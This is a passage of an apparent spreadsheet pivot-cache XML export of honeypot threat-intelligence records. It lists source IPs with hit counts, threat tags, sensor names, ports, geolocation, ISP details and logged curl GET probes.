    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H4&amp;&amp;SMA-LAB_MT-CPA_H15&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H21"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;13115&amp;&amp;23&amp;&amp;9100&amp;&amp;80&amp;&amp;20081&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IL"/>
    <s v="Israel"/>
    <s v="M"/>
    <s v="Central District"/>
    <s v="Petach Tikva"/>
    <s v="Petah Tikva"/>
    <s v="293918"/>
    <s v="NA"/>
    <s v="32.0887"/>
    <s v="34.8569"/>
    <s v="12400"/>
    <s v="Partner Communications Ltd."/>
    <s v="Partner Communications"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:50b2:e4c1"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1816"/>
    <x v="1816"/>
    <s v="NA&amp;&amp;220-134-63-96.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-14T17:11:06"/>
    <d v="2025-02-17T17:44:02"/>
    <d v="2025-04-14T17:11:06"/>
    <n v="268"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;53073&amp;&amp;53099&amp;&amp;9100&amp;&amp;80&amp;&amp;52925&amp;&amp;52947&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Taipei"/>
    <s v="1668341"/>
    <s v="NA"/>
    <s v="25.0334"/>
    <s v="121.566"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA&amp;&amp;GET"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '193.57.136.113:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '103.113.68.70:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.233.76.135:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dc86:3f60"/>
    <s v="C-I_D"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1817"/>
    <x v="1817"/>
    <s v="125-229-164-216.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-14T17:10:14"/>
    <d v="2023-11-30T15:09:18"/>
    <d v="2025-04-14T17:10:14"/>
    <n v="680"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_HTTP_H2&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_HTTP_H21&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_MT-CPA_H4&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H12"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;80&amp;&amp;43548&amp;&amp;37528&amp;&amp;55346&amp;&amp;3419&amp;&amp;9100&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NA&amp;&amp;login&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '103.113.68.70:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7de5:a4d8"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1818"/>
    <x v="1818"/>
    <s v="NA&amp;&amp;220-132-41-211.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-14T17:09:13"/>
    <d v="2024-12-15T09:22:31"/>
    <d v="2025-04-14T17:09:13"/>
    <n v="353"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_HTTP_H18&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_MT-CPA_H27&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H8"/>
    <s v="23&amp;&amp;80&amp;&amp;61660&amp;&amp;9100&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GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.250.150.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dc84:29d3"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1819"/>
    <x v="1819"/>
    <s v="node-ewj.pool-101-108.dynamic.totinternet.net"/>
    <x v="0"/>
    <d v="2025-04-14T17:04:14"/>
    <d v="2025-04-14T17:04:14"/>
    <d v="2025-04-14T17:04:14"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TH"/>
    <s v="Thailand"/>
    <s v="10"/>
    <s v="Bangkok"/>
    <s v="Phra Nakhon"/>
    <s v="Phra Nakhon"/>
    <s v="10128831"/>
    <s v="NA"/>
    <s v="13.7651"/>
    <s v="100.499"/>
    <s v="23969"/>
    <s v="TOT-NET"/>
    <s v="TOT Public Company Limited"/>
    <s v="consumer"/>
    <s v="TOT Public Company Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="2019-05-14 09:00:25"/>
    <s v="2026-05-14 09:00:25"/>
    <s v="2023-05-18 14:44:23"/>
    <s v="['CORA.NS.CLOUDFLARE.COM', 'PHIL.NS.CLOUDFLARE.COM']"/>
    <s v="GMO Internet, Inc."/>
    <s v="clientTransferProhibited https://icann.org/epp#clientTransferProhibited"/>
    <s v="Whois Privacy Protection Service by onamae.com"/>
    <x v="4"/>
    <s v="NA"/>
    <s v="['26-1 Sakuragaoka-cho', 'Cerulean Tower 11F']"/>
    <s v="::ffff:656c:4b73"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1820"/>
    <x v="1820"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T17:03:45"/>
    <d v="2025-04-13T19:46:16"/>
    <d v="2025-04-14T17:03:45"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="HN"/>
    <s v="Hanoi"/>
    <s v="NA"/>
    <s v="Hanoi"/>
    <s v="1581130"/>
    <s v="NA"/>
    <s v="21.0278"/>
    <s v="105.834"/>
    <s v="45899"/>
    <s v="VNPT Corp"/>
    <s v="VietNam Post and Telecom Corporation"/>
    <s v="business"/>
    <s v="Vietnam Posts and Telecommunications Group"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7b15:4450"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1821"/>
    <x v="1821"/>
    <s v="125-229-23-90.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-14T16:51:49"/>
    <d v="2023-11-30T00:58:07"/>
    <d v="2025-04-14T16:51:49"/>
    <n v="20"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H19&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="50193&amp;&amp;23&amp;&amp;80"/>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None&amp;&amp;login&amp;&amp;connection&amp;&amp;GET"/>
    <s v="{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '193.57.136.113:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <x v="1"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:7de5:175a"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1822"/>
    <x v="1822"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T16:35:18"/>
    <d v="2025-04-14T16:35:18"/>
    <d v="2025-04-14T16:35:18"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Connaught Lane)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6306"/>
    <s v="77.2239"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="corporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75e9:90e0"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1823"/>
    <x v="1823"/>
    <s v="125-229-68-139.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-14T16:11:34"/>
    <d v="2023-07-26T00:12:00"/>
    <d v="2025-04-14T16:11:34"/>
    <n v="14825"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;abuseipdb&amp;&amp;SMA-LAB_MT-CPA_H35&amp;&amp;SMA-LAB_HTTP_H13&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_MT-CPA_H31&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H34"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;NA&amp;&amp;53707&amp;&amp;80&amp;&amp;23&amp;&amp;51082&amp;&amp;9100"/>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NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7de5:448b"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1824"/>
    <x v="1824"/>
    <s v="122-117-24-23.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-14T16:11:01"/>
    <d v="2024-09-01T04:34:00"/>
    <d v="2025-04-14T16:11:01"/>
    <n v="1054"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H18&amp;&amp;SMA-LAB_HTTP_H19&amp;&amp;SMA-LAB_SSH_H37&amp;&amp;SMA-LAB_MT-CPA_H23&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_HTTP_H6&amp;&amp;SMA-LAB_HTTP_H22&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H41"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;22&amp;&amp;36560&amp;&amp;23&amp;&amp;NA&amp;&amp;9100"/>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NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '103.113.68.70:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '109.123.229.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7a75:1817"/>
    <s v="C-I_D"/>
    <s v="medium&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1825"/>
    <x v="1825"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T15:57:04"/>
    <d v="2025-02-09T07:04:57"/>
    <d v="2025-04-14T15:57:04"/>
    <n v="1708"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_RDP_H11"/>
    <s v="5900&amp;&amp;3389&amp;&amp;54066&amp;&amp;65019&amp;&amp;59266&amp;&amp;64188&amp;&amp;52897&amp;&amp;63633&amp;&amp;58018&amp;&amp;52328&amp;&amp;57234&amp;&amp;51433&amp;&amp;50909&amp;&amp;61591&amp;&amp;55935&amp;&amp;56543&amp;&amp;54127&amp;&amp;59169&amp;&amp;64831&amp;&amp;53513&amp;&amp;64237&amp;&amp;58617&amp;&amp;63671&amp;&amp;64834&amp;&amp;53705&amp;&amp;64492&amp;&amp;58936&amp;&amp;64174&amp;&amp;58615&amp;&amp;56394&amp;&amp;61671&amp;&amp;50558&amp;&amp;56093&amp;&amp;61363&amp;&amp;55829&amp;&amp;50264&amp;&amp;50473&amp;&amp;61220&amp;&amp;55632&amp;&amp;50097&amp;&amp;60926&amp;&amp;55437&amp;&amp;49870&amp;&amp;60509&amp;&amp;54649&amp;&amp;49352&amp;&amp;60161&amp;&amp;65466&amp;&amp;54387&amp;&amp;55361&amp;&amp;49818&amp;&amp;60658&amp;&amp;55151&amp;&amp;49598&amp;&amp;60413&amp;&amp;54798&amp;&amp;60011&amp;&amp;65203&amp;&amp;64872&amp;&amp;59233&amp;&amp;53612&amp;&amp;58752&amp;&amp;64371&amp;&amp;63904&amp;&amp;51912&amp;&amp;62698&amp;&amp;57116&amp;&amp;51475&amp;&amp;62227&amp;&amp;50955&amp;&amp;62383&amp;&amp;56799&amp;&amp;51170&amp;&amp;61915&amp;&amp;60044&amp;&amp;54342&amp;&amp;65071&amp;&amp;59404&amp;&amp;53814&amp;&amp;61569&amp;&amp;50170&amp;&amp;60900&amp;&amp;60333&amp;&amp;53473&amp;&amp;61037&amp;&amp;55374&amp;&amp;50312&amp;&amp;49719&amp;&amp;54771&amp;&amp;65478&amp;&amp;54084&amp;&amp;64812&amp;&amp;59763&amp;&amp;59166&amp;&amp;53522&amp;&amp;60778&amp;&amp;55119&amp;&amp;49476&amp;&amp;60208&amp;&amp;54556&amp;&amp;59603&amp;&amp;65262&amp;&amp;64311&amp;&amp;53583&amp;&amp;58711&amp;&amp;63867&amp;&amp;52588&amp;&amp;58240&amp;&amp;52837&amp;&amp;58049&amp;&amp;52464&amp;&amp;63304&amp;&amp;57677&amp;&amp;52114&amp;&amp;58927&amp;&amp;63832&amp;&amp;58227&amp;&amp;52632&amp;&amp;57852&amp;&amp;63427&amp;&amp;63045&amp;&amp;52255&amp;&amp;57397&amp;&amp;62938&amp;&amp;51662&amp;&amp;62439&amp;&amp;56811&amp;&amp;61879&amp;&amp;56283&amp;&amp;51168&amp;&amp;61289&amp;&amp;50007&amp;&amp;60756&amp;&amp;49505&amp;&amp;55142&amp;&amp;60284&amp;&amp;54688&amp;&amp;65449&amp;&amp;59830&amp;&amp;54209&amp;&amp;